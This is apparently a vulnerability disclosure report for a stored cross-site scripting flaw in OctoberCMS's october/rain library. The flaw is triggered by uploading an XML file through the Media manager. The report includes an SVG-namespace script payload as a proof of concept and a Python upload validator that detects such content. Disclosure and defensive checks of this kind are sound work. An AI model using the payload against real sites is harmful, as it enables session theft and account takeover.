Cross-site Scripting (XSS) - Stored in octobercms/library
Reported on Apr 3rd 2021
✍️ Description
OctoberCMS uses the october/rain library to handle file uploads. Previously it was possible to upload malicious files with HTML content to the CMS via its Media upload feature; that issue, tracked as CVE-2020-15249, was fixed in 1.0.469. It is still possible to upload XML files, however. Because browsers render an XML document according to the namespace its elements declare, an XML file can be crafted so that the browser executes script when it is opened, which yields an XSS.
🕵️‍♂️ Proof of Concept
While logged in as a user with upload privileges, visit backend/backend/media and upload an XML file with the following content:
Contents of PoC.xml:
<script xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">
alert('xss');
</script>
The file is uploaded to /storage/app/media/PoC.xml.
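The description above notes that browsers render an XML file according to its namespace. The following check, an added example that is not part of this report or of october/rain, shows how an upload handler could inspect the raw bytes of an XML upload before storing it and reject documents a browser would execute; the function name `xml_upload_is_safe` and the sample inputs are constructed for this example.

```python
# Added example, not october/rain code: content check for uploaded XML.
import xml.etree.ElementTree as ET

# Namespaces a browser treats as renderable, active content when served as XML.
ACTIVE_NAMESPACES = {
    "http://www.w3.org/2000/svg",
    "http://www.w3.org/1999/xhtml",
}

def _split_tag(tag):
    """Split an ElementTree tag like '{ns}local' into (ns, local)."""
    if tag.startswith("{"):
        ns, _, local = tag[1:].partition("}")
        return ns, local
    return "", tag

def xml_upload_is_safe(data):
    """Return (ok, reason). ok is False when the document could run script
    in a browser. Malformed XML is rejected as well (fail closed). In
    production parse with defusedxml to also defuse entity-expansion attacks."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, "not well-formed XML: %s" % exc
    for elem in root.iter():
        if not isinstance(elem.tag, str):  # skip comments / PIs if present
            continue
        ns, local = _split_tag(elem.tag)
        if ns in ACTIVE_NAMESPACES:
            return False, "<%s> is in browser-rendered namespace %s" % (local, ns)
        if local.lower() == "script":
            return False, "<script> element present"
        for name, value in elem.attrib.items():
            _, attr = _split_tag(name)
            if attr.lower().startswith("on"):
                return False, "event handler attribute %s" % attr
            if value.strip().lower().startswith("javascript:"):
                return False, "javascript: URL in attribute %s" % attr
    return True, "ok"

# Constructed sample inputs: the report's PoC and a harmless data file.
POC_XML = b"""<script xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">
alert('xss');
</script>"""
PLAIN_XML = b"<catalog><item id='1'>widget</item></catalog>"

if __name__ == "__main__":
    for label, blob in (("PoC.xml", POC_XML), ("catalog.xml", PLAIN_XML)):
        print(label, xml_upload_is_safe(blob))
```

Serving stored media with `X-Content-Type-Options: nosniff` and a `Content-Disposition: attachment` header is a complementary mitigation that does not depend on the content check.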
💥 Impact
This is a stored cross-site scripting vulnerability. It can be leveraged for account takeover, privilege escalation and Server Side Template Injection, and can also be chained with another vulnerability to gain remote code execution.